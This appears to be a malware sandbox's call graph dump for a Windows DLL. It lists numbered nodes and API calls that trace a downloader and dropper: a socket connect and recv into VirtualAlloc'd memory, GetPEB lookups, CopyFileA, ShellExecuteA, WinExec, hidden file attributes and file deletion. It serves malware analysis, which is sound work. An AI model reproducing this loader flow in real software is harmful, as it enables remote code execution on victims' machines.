10009c91 Sleep 11428->11429 11430 10009ca9 11429->11430 11431 10002190 8 API calls 11430->11431 11432 10009cb5 _Smanip _Error_objects 11431->11432 11433 1000b990 10 API calls 11432->11433 11434 10009d2a 11433->11434 11435 10004540 10 API calls 11434->11435 11436 10009d41 11435->11436 11437 10002210 8 API calls 11436->11437 11438 10009d8b 11437->11438 11439 10004390 14 API calls 11438->11439 11440 10009d97 11439->11440 11441 100020a0 2 API calls 11440->11441 11442 10009daf 11441->11442 11443 1000b970 2 API calls 11442->11443 11444 10009dbe 11443->11444 11445 100020a0 2 API calls 11444->11445 11446 10009dcd 11445->11446 11447 10002190 8 API calls 11446->11447 11448 10009de5 _Smanip _Error_objects 11447->11448 11449 1000b990 10 API calls 11448->11449 11450 10009e5e 11449->11450 11451 10004540 10 API calls 11450->11451 11452 10009e75 11451->11452 11453 10002210 8 API calls 11452->11453 11454 10009ebf 11453->11454 11455 10004390 14 API calls 11454->11455 11456 10009ecb 11455->11456 11457 100020c0 2 API calls 11456->11457 11458 10009ef2 11457->11458 11459 100020a0 2 API calls 11458->11459 11460 10009efd 11459->11460 11461 100020a0 2 API calls 11460->11461 11462 10009f0c 11461->11462 11463 1000b970 2 API calls 11462->11463 11464 10009f1b 11463->11464 11465 100020a0 2 API calls 11464->11465 11466 10009f2a 11465->11466 11467 1000d260 8 API calls 11466->11467 11468 10009f43 11467->11468 11469 1000d2f0 10 API calls 11468->11469 11470 10009f71 11469->11470 11471 1000d2f0 10 API calls 11470->11471 11472 10009f9f 11471->11472 11473 1000d2f0 10 API calls 11472->11473 11474 10009fcd 11473->11474 11475 1000d2f0 10 API calls 11474->11475 11476 10009ffb 11475->11476 11477 1000d2f0 10 API calls 11476->11477 11478 1000a029 11477->11478 11479 1000d2f0 10 API calls 11478->11479 11480 1000a057 11479->11480 11481 1000d2f0 10 API calls 11480->11481 11482 1000a085 11481->11482 11483 1000d2f0 10 API calls 11482->11483 11484 1000a0b3 11483->11484 11485 1000d2f0 10 API calls 11484->11485 11486 1000a0e1 11485->11486 11487 1000d2f0 10 API calls 11486->11487 11488 1000a10f 11487->11488 11489 1000d2f0 10 API calls 11488->11489 11490 1000a13d 11489->11490 11491 100020a0 2 API calls 11490->11491 11492 1000a14f 11491->11492 11493 100020a0 2 API calls 11492->11493 11494 1000a15e 11493->11494 11495 100020a0 2 API calls 11494->11495 11496 1000a16d 11495->11496 11497 100020a0 2 API calls 11496->11497 11498 1000a17c 11497->11498 11499 100020a0 2 API calls 11498->11499 11500 1000a18b 11499->11500 11501 100020a0 2 API calls 11500->11501 11502 1000a19a 11501->11502 11503 100020a0 2 API calls 11502->11503 11504 1000a1a9 11503->11504 11505 100020a0 2 API calls 11504->11505 11506 1000a1b8 11505->11506 11507 100020a0 2 API calls 11506->11507 11508 1000a1c7 11507->11508 11509 100020a0 2 API calls 11508->11509 11510 1000a1d6 11509->11510 11511 100020a0 2 API calls 11510->11511 11512 1000a1e5 11511->11512 11513 10004680 DeleteFileA 11512->11513 11514 1000a1f7 11513->11514 11515 10002190 8 API calls 11514->11515 11516 1000a211 11515->11516 11517 10004440 31 API calls 11516->11517 11518 1000a228 11517->11518 11519 100020a0 2 API calls 11518->11519 11520 1000a23a Sleep 11519->11520 11521 1000a252 _Smanip _Error_objects 11520->11521 11522 1000b990 10 API calls 11521->11522 11523 1000a4a1 11522->11523 11524 10004540 10 API calls 11523->11524 11525 1000a4b8 _Smanip _Error_objects 11524->11525 11526 1000b990 10 API calls 11525->11526 11527 1000a55e 11526->11527 11528 10004540 10 API calls 11527->11528 11529 1000a575 11528->11529 11530 1000d150 9 API calls 11529->11530 11531 1000a5b4 11530->11531 11532 100020a0 2 API calls 11531->11532 11533 1000a5c6 11532->11533 11534 1000b970 2 API calls 11533->11534 11535 1000a5d5 11534->11535 11536 100020a0 2 API calls 11535->11536 11537 1000a5e4 11536->11537 11538 1000b970 2 API calls 11537->11538 11539 1000a5f3 11538->11539 11540 1000a601 WinExec 11539->11540 11541 1000a614 _Smanip _Error_objects 11540->11541 11542 1000b990 10 API calls 11541->11542 11543 1000a74d 11542->11543 11544 10004540 10 API calls 11543->11544 11545 1000a764 11544->11545 11546 1000b970 2 API calls 11545->11546 11547 1000a776 _Smanip _Error_objects 11546->11547 11548 1000b990 10 API calls 11547->11548 11549 1000a809 11548->11549 11550 10004540 10 API calls 11549->11550 11551 1000a820 11550->11551 11552 10002f30 11 API calls 11551->11552 11553 1000a853 11552->11553 11554 10002f00 11 API calls 11553->11554 11555 1000a892 11554->11555 11556 100020c0 2 API calls 11555->11556 11557 1000a8ad 11556->11557 11558 100020a0 2 API calls 11557->11558 11559 1000a8b8 11558->11559 11560 100020a0 2 API calls 11559->11560 11561 1000a8c7 11560->11561 11562 100020a0 2 API calls 11561->11562 11563 1000a8d6 11562->11563 11564 1000b970 2 API calls 11563->11564 11565 1000a8e5 11564->11565 11566 1000a8f3 WinExec Sleep 11565->11566 11567 1000a911 11566->11567 11568 10002190 8 API calls 11567->11568 11569 1000a91d 11568->11569 11570 100048a0 SetFileAttributesA 11569->11570 11571 1000a92d 11570->11571 11572 100020a0 2 API calls 11571->11572 11573 1000a93f 11572->11573 11574 10002190 8 API calls 11573->11574 11575 1000a957 11574->11575 11576 100048a0 SetFileAttributesA 11575->11576 11577 1000a967 11576->11577 11578 100020a0 2 API calls 11577->11578 11579 1000a979 11578->11579 11580 10004680 DeleteFileA 11579->11580 11581 1000a98b 11580->11581 11582 10004680 DeleteFileA 11581->11582 11583 1000a99f 11582->11583 11584 100020a0 2 API calls 11583->11584 11585 1000a9bb 11584->11585 11586 100020a0 2 API calls 11585->11586 11587 1000a9ca 11586->11587 11588 100020a0 2 API calls 11587->11588 11589 1000a9d9 11588->11589 11590 100020a0 2 API calls 11589->11590 11591 1000a9e8 11590->11591 11592 100020a0 2 API calls 11591->11592 11593 1000a9f7 11592->11593 11594 100020a0 2 API calls 11593->11594 11595 1000aa06 11594->11595 11596 100020a0 2 API calls 11595->11596 11597 1000aa15 11596->11597 11598 100020a0 2 API calls 11597->11598 11599 1000aa24 11598->11599 11600 100020a0 2 API calls 11599->11600 11601 1000aa33 11600->11601 11602 100020a0 2 API calls 11601->11602 11603 1000aa42 11602->11603 11604 100020a0 2 API calls 11603->11604 11605 1000aa51 11604->11605 11606 100020a0 2 API calls 11605->11606 11607 1000aa60 11606->11607 11608 1000b970 2 API calls 11607->11608 11609 1000aa6f 11608->11609 11610 1000b970 2 API calls 11609->11610 11611 1000aa7e 11610->11611 11612 100020a0 2 API calls 11611->11612 11613 1000aa8d 11612->11613 11614 100020a0 2 API calls 11613->11614 11615 1000aa9f 11614->11615 10699 2870097 WSAStartup getaddrinfo 10700 2870110 WSACleanup 10699->10700 10709 2870129 10699->10709 10713 287011e 10700->10713 10701 2870144 socket 10703 2870186 connect 10701->10703 10704 287016d WSACleanup 10701->10704 10702 28701cc FreeAddrInfoW 10705 28701e0 WSACleanup 10702->10705 10714 28701f9 10702->10714 10706 28701c5 10703->10706 10707 28701aa closesocket 10703->10707 10704->10713 10705->10713 10706->10702 10707->10709 10708 2870200 recv 10708->10714 10709->10701 10709->10702 10710 2870282 closesocket WSACleanup 10710->10714 10711 287027e 10712 28702bf VirtualAlloc 10711->10712 10712->10713 10714->10708 10714->10710 10714->10711 10714->10712 10714->10713 10715 1000ac10 10716 1000ac21 fpos 10715->10716 10717 1000c1b0 2 API calls 10716->10717 10722 1000ac57 10716->10722 10718 1000ac38 10717->10718 10719 1000ac3f fsetpos 10718->10719 10718->10722 10720 1000ac68 fpos 10719->10720 10719->10722 10721 1000c120 2 API calls 10720->10721 10721->10722 11191 1000d110 ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEDD ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@D ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12 11616 1000ab90 11617 1000ab9f 11616->11617 11618 1000abe6 11617->11618 11619 1000abc6 setvbuf 11617->11619 11619->11618 11620 1000abea 11619->11620 11621 1000c2d0 3 API calls 11620->11621 11621->11618 10723 2864897 10724 28648cf 10723->10724 10753 2864677 GetModuleFileNameA 10724->10753 10726 28648f8 _Smanip _Error_objects 10755 28645c7 SHGetFolderPathA 10726->10755 10728 2869a0b _Smanip _Error_objects 10757 2864657 DeleteFileA 10728->10757 10730 2869c25 10759 2864417 10730->10759 10732 2869c56 10733 2869c68 Sleep 10732->10733 10734 2869c80 _Smanip _Error_objects 10733->10734 10735 2864657 DeleteFileA 10734->10735 10736 286a1ce 10735->10736 10737 2864417 SetFileAttributesA 10736->10737 10738 286a1ff 10737->10738 10739 286a211 Sleep 10738->10739 10740 286a229 _Smanip _Error_objects 10739->10740 10741 286a5d8 WinExec 10740->10741 10742 286a5eb _Smanip _Error_objects 10741->10742 10743 286a8ca WinExec Sleep 10742->10743 10744 286a8e8 10743->10744 10763 2864877 10744->10763 10746 286a904 10747 2864877 SetFileAttributesA 10746->10747 10748 286a93e 10747->10748 10749 2864657 DeleteFileA 10748->10749 10750 286a962 10749->10750 10751 2864657 DeleteFileA 10750->10751 10752 286a976 10751->10752 10754 28646bf _Error_objects Concurrency::task_continuation_context::task_continuation_context 10753->10754 10754->10726 10756 28645f2 10755->10756 10756->10728 10758 2864668 10757->10758 10758->10730 10761 286444a 10759->10761 10760 28644be 10760->10732 10761->10760 10762 28644b6 SetFileAttributesA 10761->10762 10762->10760 10766 2861f27 10763->10766 10765 2864887 SetFileAttributesA 10765->10746 10767 2861f36 Concurrency::task_continuation_context::task_continuation_context 10766->10767 10767->10765 10920 1000d091 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 10924 10010697 10925 10010699 10924->10925 10926 100106b1 10925->10926 10928 100106b2 10925->10928 10929 100106bd 10928->10929 10930 100106c9 free 10929->10930 10931 100106d2 10929->10931 10930->10931 10931->10925 10932 10010e9b 10933 10010ea4 10932->10933 10934 10010ea9 10932->10934 10938 10011436 10933->10938 10942 10010d65 10934->10942 10939 1001144c 10938->10939 10941 10011455 10939->10941 10957 100113e9 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 10939->10957 10941->10934 10944 10010d71 ___scrt_is_nonwritable_in_current_image 10942->10944 10943 10010d80 10944->10943 10945 10010d9a dllmain_raw 10944->10945 10946 10010d95 10944->10946 10945->10943 10947 10010db4 dllmain_crt_dispatch 10945->10947 10958 10011481 10946->10958 10947->10943 10947->10946 10950 10010e06 10950->10943 10951 10010e0f dllmain_crt_dispatch 10950->10951 10951->10943 10953 10010e22 dllmain_raw 10951->10953 10952 10011481 _DllMain@12 DisableThreadLibraryCalls 10954 10010ded 10952->10954 10953->10943 10962 10010cb7 10954->10962 10956 10010dfb dllmain_raw 10956->10950 10957->10941 10959 1001148a 10958->10959 10960 10010dd5 10958->10960 10959->10960 10961 10011493 DisableThreadLibraryCalls 10959->10961 10960->10950 10960->10952 10961->10960 10963 10010cc3 ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 10962->10963 10964 10010cf4 10963->10964 10965 10010d5d 10963->10965 10975 10010ccc ___scrt_uninitialize_crt __RTC_Initialize __DllMainCRTStartup@12 10963->10975 10985 10010912 10964->10985 10992 1001124d IsProcessorFeaturePresent 10965->10992 10968 10010cf9 10991 100114af __std_type_info_destroy_list 10968->10991 10970 10010d64 ___scrt_is_nonwritable_in_current_image 10971 10010d80 10970->10971 10972 10010d9a dllmain_raw 10970->10972 10973 10010d95 10970->10973 10971->10956 10972->10971 10974 10010db4 dllmain_crt_dispatch 10972->10974 10976 10011481 _DllMain@12 DisableThreadLibraryCalls 10973->10976 10974->10971 10974->10973 10975->10956 10977 10010dd5 10976->10977 10978 10010e06 10977->10978 10980 10011481 _DllMain@12 DisableThreadLibraryCalls 10977->10980 10978->10971 10979 10010e0f dllmain_crt_dispatch 10978->10979 10979->10971 10981 10010e22 dllmain_raw 10979->10981 10982 10010ded 10980->10982 10981->10971 10983 10010cb7 __DllMainCRTStartup@12 10 API calls 10982->10983 10984 10010dfb dllmain_raw 10983->10984 10984->10978 10986 10010917 ___scrt_release_startup_lock 10985->10986 10987 1001091b _execute_onexit_table 10986->10987 10988 10010927 __DllMainCRTStartup@12 10986->10988 10987->10968 10989 10010934 10988->10989 10990 100116c7 _cexit 10988->10990 10989->10968 10991->10975 10993 10011263 __DllMainCRTStartup@12 10992->10993 10994 1001126f memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10993->10994 10995 10011352 __DllMainCRTStartup@12 10994->10995 10995->10970 11622 1000999a 11623 100020a0 2 API calls 11622->11623 11624 100099af 11623->11624 11625 100020a0 2 API calls 11624->11625 11626 100099be 11625->11626 11627 100020a0 2 API calls 11626->11627 11628 100099cd 11627->11628 11629 100020a0 2 API calls 11628->11629 11630 100099dc 11629->11630 11631 1000b970 2 API calls 11630->11631 11632 100099eb 11631->11632 11633 1000b970 2 API calls 11632->11633 11634 100099fa 11633->11634 11635 100020a0 2 API calls 11634->11635 11636 10009a09 11635->11636 11637 100020a0 2 API calls 11636->11637 11638 10009a1b 11637->11638 10996 1000109e 10997 10010b09 _Error_objects 2 API calls 10996->10997 10998 100010a3 10997->10998 10772 1000b020 ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 10773 1000b080 10772->10773 10774 1000b04c ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 10772->10774 10776 1000b078 Concurrency::task_continuation_context::task_continuation_context 10773->10776 10777 1000c120 2 API calls 10773->10777 10774->10773 10775 1000b064 ?_Gninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 10774->10775 10775->10776 10778 1000b09b 10777->10778 10779 1000b0a5 10778->10779 10787 1000b0e1 _Error_objects 10778->10787 10797 10003e80 fgetc 10779->10797 10781 1000b0f0 fgetc 10782 1000b109 Concurrency::task_continuation_context::task_continuation_context 10781->10782 10781->10787 10784 100020a0 2 API calls 10782->10784 10783 1000bc00 Concurrency::task_continuation_context::task_continuation_context 10 API calls 10783->10787 10784->10776 10785 1000b15e ?in@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PBD1AAPBDPAD3AAPAD 10785->10787 10786 1000b198 10788 1000b233 10786->10788 10792 1000b1a2 Concurrency::task_continuation_context::task_continuation_context 10786->10792 10787->10781 10787->10783 10787->10785 10787->10786 10790 1000b1af 10787->10790 10799 1000c960 10787->10799 10791 100020a0 2 API calls 10788->10791 10794 1000b1f4 10790->10794 10795 1000b1cf ungetc 10790->10795 10791->10776 10793 100020a0 2 API calls 10792->10793 10793->10776 10796 100020a0 2 API calls 10794->10796 10795->10790 10796->10776 10798 10003e9a 10797->10798 10798->10776 10800 10002cf0 ?_Xout_of_range@std@@YAXPBD 10799->10800 10801 1000c97b 10800->10801 10804 1000cc00 10801->10804 10805 1000cc1f Concurrency::task_continuation_context::task_continuation_context 10804->10805 10808 10002d50 memmove 10805->10808 10807 1000c98b 10807->10787 10808->10807 10809 10004220 10810 100042cb _Error_objects 10809->10810 10811 1000cd10 10 API calls 10810->10811 10812 1000431d 10811->10812 10813 10004020 5 API calls 10812->10813 10814 1000432f 10813->10814 10815 10002190 8 API calls 10814->10815 10816 10004341 10815->10816 10817 100020a0 2 API calls 10816->10817 10818 1000436b 10817->10818 10819 1000b970 2 API calls 10818->10819 10820 1000437a 10819->10820 10999 1000b2a0 ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11000 1000b2b7 ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 10999->11000 11002 1000b2e3 Concurrency::task_continuation_context::task_continuation_context 10999->11002 11001 1000b2cf ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11000->11001 11000->11002 11001->11002 11003 1000b4a0 11004 1000b4b3 Concurrency::task_continuation_context::task_continuation_context 11003->11004 11005 1000b4c3 Concurrency::task_continuation_context::task_continuation_context 11004->11005 11006 1000b4d4 ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11004->11006 11007 1000b4e1 ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ ?epptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11006->11007 11008 1000b51e 11006->11008 11007->11008 11009 1000b4f9 11007->11009 11008->11005 11010 1000c120 2 API calls 11008->11010 11011 1000b502 ?_Pninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11009->11011 11012 1000b539 11010->11012 11011->11005 11013 1000b543 11012->11013 11014 1000b58b 11012->11014 11022 10003eb0 fputc 11013->11022 11015 1000b59b ?out@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PBD1AAPBDPAD3AAPAD 11014->11015 11016 1000b5e9 11015->11016 11017 1000b5db 11015->11017 11016->11005 11020 1000b5f6 fwrite 11016->11020 11017->11016 11019 1000b5e1 11017->11019 11019->11005 11021 10003eb0 fputc 11019->11021 11020->11005 11021->11005 11023 10003ecb 11022->11023 11023->11005 11192 1000ab20 11193 1000ab32 Concurrency::task_continuation_context::task_continuation_context 11192->11193 11195 1000ab85 11192->11195 11194 1000ab71 fflush 11193->11194 11193->11195 11194->11195 11639 1000ada1 ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPBD_J 11640 1000aea3 11639->11640 11641 2871520 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 11027 100102a9 11028 1001025a 11027->11028 11029 10010229 recv 11028->11029 11030 100102e8 VirtualAlloc memmove 11028->11030 11032 10010276 realloc 11028->11032 11029->11028 11031 100102a1 11029->11031 11035 1001031d 11030->11035 11033 100102a7 11031->11033 11034 100102ab closesocket WSACleanup free exit 11031->11034 11032->11028 11033->11030 11034->11035 11196 10010b2c 11197 10010b46 11196->11197 11198 10010b3e 11196->11198 11199 10010b1e _MallocaArrayHolder free 11198->11199 11199->11197 11036 100010b0 11037 100010c2 11036->11037 11038 100010d0 11036->11038 11037->11038 11039 1000114e DefWindowProcW 11037->11039 11039->11038 11040 1000acb0 ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11041 1000accc 11040->11041 11042 1000c1b0 2 API calls 11041->11042 11044 1000ad4b 11041->11044 11043 1000acfe 11042->11043 11043->11044 11045 1000ad13 _fseeki64 11043->11045 11046 1000ad33 fgetpos 11043->11046 11045->11044 11045->11046 11046->11044 11047 1000ad5c 11046->11047 11048 1000c120 2 API calls 11047->11048 11048->11044 11049 1000aeb0 11050 1000aebf 11049->11050 11051 1000aec7 11050->11051 11052 1000aef3 ?_Gnavail@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11050->11052 11053 1000aed9 ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPAD_J 11050->11053 11054 1000af66 11052->11054 11055 1000af17 _Min_value 11052->11055 11053->11051 11054->11051 11057 1000c120 2 API calls 11054->11057 11056 1000af24 ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11055->11056 11064 10002ac0 memmove 11056->11064 11059 1000af7b 11057->11059 11061 1000afd7 11059->11061 11062 1000af8b fread 11059->11062 11060 1000af43 ?gbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH 11060->11054 11061->11051 11063 1000afdd fread 11061->11063 11062->11051 11062->11059 11063->11051 11064->11060 11065 1000b6b0 11066 1000b6d0 11065->11066 11067 1000b6c0 _lock_file 11065->11067 11067->11066 11642 1000bdb0 11643 1000b6e0 9 API calls 11642->11643 11644 1000bdbf 11643->11644 11645 10010b1e _MallocaArrayHolder free 11644->11645 11646 1000bdd2 11644->11646 11645->11646 11068 2861a37 11069 2861a58 GetModuleHandleA CreateWindowExW 11068->11069 11070 2861a49 11068->11070 11076 2861abb SendMessageW 11069->11076 11071 2861a53 NtdllDefWindowProc_W 11070->11071 11072 2861b29 PostQuitMessage 11070->11072 11073 2861b4c 11071->11073 11072->11073 11077 2861ae5 11076->11077 11078 2861b09 CreateThread 11077->11078 11078->11073 11079 10001b80 79 API calls 11078->11079 9600 2860032 9610 2860ae4 GetPEB 9600->9610 9603 2860ae4 GetPEB 9606 28602a7 9603->9606 9604 28604a6 GetNativeSystemInfo 9605 28604d3 VirtualAlloc 9604->9605 9607 2860a9c 9604->9607 9608 28604ec 9605->9608 9606->9604 9606->9607 9608->9607 9612 10010610 9608->9612 9611 286029b 9610->9611 9611->9603 9617 10010450 9612->9617 9650 100045f0 SHGetFolderPathA 9617->9650 9621 1001048c 9670 10010080 9621->9670 9625 100104d3 9676 100020a0 9625->9676 9627 1001055c 9628 10010582 9627->9628 9629 10010564 9627->9629 9631 10010330 9 API calls 9628->9631 9630 100020a0 2 API calls 9629->9630 9632 10010570 9630->9632 9633 1001058e 9631->9633 9634 100020a0 2 API calls 9632->9634 9636 100105a5 CopyFileA 9633->9636 9635 1001057f GetCurrentThread WaitForSingleObject CreateThread CreateThread 9634->9635 9644 10001170 LoadLibraryW GetProcAddress GetProcAddress 9635->9644 9894 100048c0 9635->9894 10136 100100c0 WSAStartup getaddrinfo 9635->10136 9637 100020a0 2 API calls 9636->9637 9638 100105b7 ShellExecuteA 9637->9638 9679 10001830 GetModuleHandleA 9638->9679 9641 100020a0 2 API calls 9642 100105e3 9641->9642 9643 100020a0 2 API calls 9642->9643 9643->9635 9645 100011c2 GetModuleHandleA RegisterClassW CreateWindowExW 9644->9645 9647 10001245 exit 9645->9647 9648 10001247 GetMessageW 9645->9648 9647->9607 9648->9647 9649 1000125b TranslateMessage DispatchMessageW 9648->9649 9649->9648 9651 1000463a 9650->9651 9652 1000461b 9650->9652 9654 1000cde0 22 API calls 9651->9654 9709 10002190 9652->9709 9655 1000464b ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z 9654->9655 9656 10002190 8 API calls 9655->9656 9657 1000462a 9656->9657 9658 10010380 GetModuleFileNameA 9657->9658 9659 10002190 8 API calls 9658->9659 9660 100103c8 9659->9660 9737 10001f00 9660->9737 9663 100103e7 9741 10001ec0 9663->9741 9665 10010419 9668 100020a0 2 API calls 9665->9668 9667 100020a0 2 API calls 9669 10010414 9667->9669 9668->9669 9669->9621 9763 10010030 9670->9763 9673 10010330 GetModuleFileNameA 9674 10002190 8 API calls 9673->9674 9675 10010363 9674->9675 9675->9625 9768 10002620 9676->9768 9678 100020af 9678->9627 9680 10002190 8 API calls 9679->9680 9681 10001873 9680->9681 9778 100016e0 9681->9778 9685 100018a1 9686 100020a0 2 API calls 9685->9686 9687 100018ac 9686->9687 9688 100020a0 2 API calls 9687->9688 9689 100018be 9688->9689 9790 10001600 9689->9790 9693 100018f3 9806 10002f30 9693->9806 9695 10001918 9696 100020c0 2 API calls 9695->9696 9697 1000192c 9696->9697 9698 100020a0 2 API calls 9697->9698 9699 10001937 9698->9699 9700 100020a0 2 API calls 9699->9700 9701 10001946 9700->9701 9702 100020a0 2 API calls 9701->9702 9703 10001958 RegisterClassW 9702->9703 9704 10001750 17 API calls 9703->9704 9705 100019db CreateWindowExW ShowWindow 9704->9705 9706 10001a14 KiUserCallbackDispatcher 9705->9706 9707 10001a28 TranslateMessage DispatchMessageW 9706->9707 9708 10001a3f 9706->9708 9707->9706 9708->9641 9710 100021c1 HandleT _Error_objects 9709->9710 9713 100030f0 9710->9713 9712 100021ea 9712->9657 9714 10003107 Concurrency::task_continuation_context::task_continuation_context 9713->9714 9716 10003111 Concurrency::task_continuation_context::task_continuation_context 9714->9716 9724 100015e0 ?_Xlength_error@std@@YAXPBD 9714->9724 9717 1000313b 9716->9717 9719 10003187 Concurrency::task_continuation_context::task_continuation_context 9716->9719 9725 10002ac0 memmove 9717->9725 9726 10003aa0 9719->9726 9721 1000315f HandleT Concurrency::task_continuation_context::task_continuation_context 9721->9712 9722 100031ae HandleT Concurrency::task_continuation_context::task_continuation_context 9729 10002ac0 memmove 9722->9729 9724->9716 9725->9721 9730 10003bb0 9726->9730 9729->9721 9733 10003c00 9730->9733 9734 10003c10 allocator 9733->9734 9735 10003c30 allocator 6 API calls 9734->9735 9736 10003ac5 9735->9736 9736->9722 9738 10001f12 Concurrency::task_continuation_context::task_continuation_context 9737->9738 9745 10002fd0 9738->9745 9740 10001f45 9740->9663 9740->9665 9742 10001ed8 _Error_objects 9741->9742 9757 10002990 9742->9757 9746 10002fe3 9745->9746 9750 1000302f _Min_value 9745->9750 9746->9750 9751 100030a0 memset 9746->9751 9748 10002ff8 9748->9750 9752 10003a20 9748->9752 9750->9740 9751->9748 9753 10003a2c _Min_value 9752->9753 9755 10003a76 9752->9755 9753->9755 9756 10003b20 memchr 9753->9756 9755->9750 9756->9753 9758 100029c5 9757->9758 9759 10002cf0 ?_Xout_of_range@std@@YAXPBD 9758->9759 9760 100029de Concurrency::task_continuation_context::task_continuation_context 9759->9760 9761 100030f0 8 API calls 9760->9761 9762 10001eed 9761->9762 9762->9667 9767 1000ece0 9763->9767 9765 1001004d __stdio_common_vsprintf 9766 10010069 9765->9766 9766->9673 9767->9765 9769 10002637 Concurrency::task_continuation_context::task_continuation_context 9768->9769 9771 10002668 Concurrency::task_continuation_context::task_continuation_context 9769->9771 9772 10002c80 9769->9772 9771->9678 9775 10002e00 9772->9775 9776 10003550 allocator 2 API calls 9775->9776 9777 10002cab 9776->9777 9777->9771 9779 10001f00 2 API calls 9778->9779 9780 100016fc 9779->9780 9781 10001705 9780->9781 9782 10001728 9780->9782 9783 10001ec0 9 API calls 9781->9783 9809 10002210 9782->9809 9785 1000171a 9783->9785 9786 100020c0 9785->9786 9788 100020d2 HandleT Concurrency::task_continuation_context::task_continuation_context 9786->9788 9787 100020da 9787->9685 9788->9787 9789 10002620 2 API calls 9788->9789 9789->9787 9827 100022b0 9790->9827 9792 1000163b SHGetKnownFolderPath 9793 100016b7 9792->9793 9794 1000166a wcstombs 9792->9794 9829 10002080 9793->9829 9795 10002190 8 API calls 9794->9795 9797 10001692 9795->9797 9799 100020c0 2 API calls 9797->9799 9798 100016c4 9803 10002f00 9798->9803 9800 100016a1 9799->9800 9801 100020a0 2 API calls 9800->9801 9802 100016a9 CoTaskMemFree 9801->9802 9802->9798 9858 10002010 9803->9858 9805 10002f17 9805->9693 9890 10002040 9806->9890 9808 10002f47 9808->9695 9810 1000223c HandleT Concurrency::task_continuation_context::task_continuation_context 9809->9810 9813 10003230 9810->9813 9812 1000228e 9812->9785 9814 10003247 Concurrency::task_continuation_context::task_continuation_context 9813->9814 9816 10003251 Concurrency::task_continuation_context::task_continuation_context 9814->9816 9824 100015e0 ?_Xlength_error@std@@YAXPBD 9814->9824 9817 1000327b 9816->9817 9819 100032ab Concurrency::task_continuation_context::task_continuation_context 9816->9819 9825 10002ac0 memmove 9817->9825 9820 10003aa0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 9819->9820 9821 100032d2 HandleT Concurrency::task_continuation_context::task_continuation_context 9820->9821 9826 10002ac0 memmove 9821->9826 9823 1000329d Concurrency::task_continuation_context::task_continuation_context 9823->9812 9824->9816 9825->9823 9826->9823 9828 100022e1 _Error_objects 9827->9828 9828->9792 9832 100026b0 9829->9832 9833 100026c0 HandleT 9832->9833 9836 10002bc0 9833->9836 9835 10002093 9835->9798 9837 10002bd4 Concurrency::task_continuation_context::task_continuation_context 9836->9837 9838 10002c18 9836->9838 9842 10002d50 memmove 9837->9842 9843 10003480 9838->9843 9841 10002bf9 Concurrency::task_continuation_context::task_continuation_context 9841->9835 9842->9841 9844 10003491 Concurrency::task_continuation_context::task_continuation_context 9843->9844 9846 1000349b Concurrency::task_continuation_context::task_continuation_context 9844->9846 9853 100015e0 ?_Xlength_error@std@@YAXPBD 9844->9853 9847 10003aa0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 9846->9847 9848 100034cc HandleT Concurrency::task_continuation_context::task_continuation_context 9847->9848 9854 10002c40 9848->9854 9850 10003509 9851 10002c80 Concurrency::task_continuation_context::task_continuation_context 2 API calls 9850->9851 9852 10003523 Concurrency::task_continuation_context::task_continuation_context 9850->9852 9851->9852 9852->9841 9853->9846 9857 10002ac0 memmove 9854->9857 9856 10002c5a Concurrency::task_continuation_context::task_continuation_context 9856->9850 9857->9856 9859 10002020 HandleT 9858->9859 9862 100026e0 9859->9862 9861 10002039 9861->9805 9863 10002700 Concurrency::task_continuation_context::task_continuation_context 9862->9863 9864 1000274d 9862->9864 9868 10002d50 memmove 9863->9868 9869 10003360 9864->9869 9867 1000272b Concurrency::task_continuation_context::task_continuation_context 9867->9861 9868->9867 9870 10003380 Concurrency::task_continuation_context::task_continuation_context 9869->9870 9872 1000338d Concurrency::task_continuation_context::task_continuation_context 9870->9872 9882 100015e0 ?_Xlength_error@std@@YAXPBD 9870->9882 9873 10003aa0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 9872->9873 9874 100033c7 HandleT Concurrency::task_continuation_context::task_continuation_context 9873->9874 9875 10003447 9874->9875 9876 100033fc HandleT 9874->9876 9877 10002780 memmove 9875->9877 9883 10002780 9876->9883 9881 1000343a Concurrency::task_continuation_context::task_continuation_context 9877->9881 9879 10003429 9880 10002c80 Concurrency::task_continuation_context::task_continuation_context 2 API calls 9879->9880 9880->9881 9881->9867 9882->9872 9888 10002ac0 memmove 9883->9888 9885 1000279a 9889 10002ac0 memmove 9885->9889 9887 100027b1 Concurrency::task_continuation_context::task_continuation_context 9887->9879 9888->9885 9889->9887 9891 1000205a Concurrency::task_continuation_context::task_continuation_context 9890->9891 9892 100026e0 11 API calls 9891->9892 9893 1000206d 9892->9893 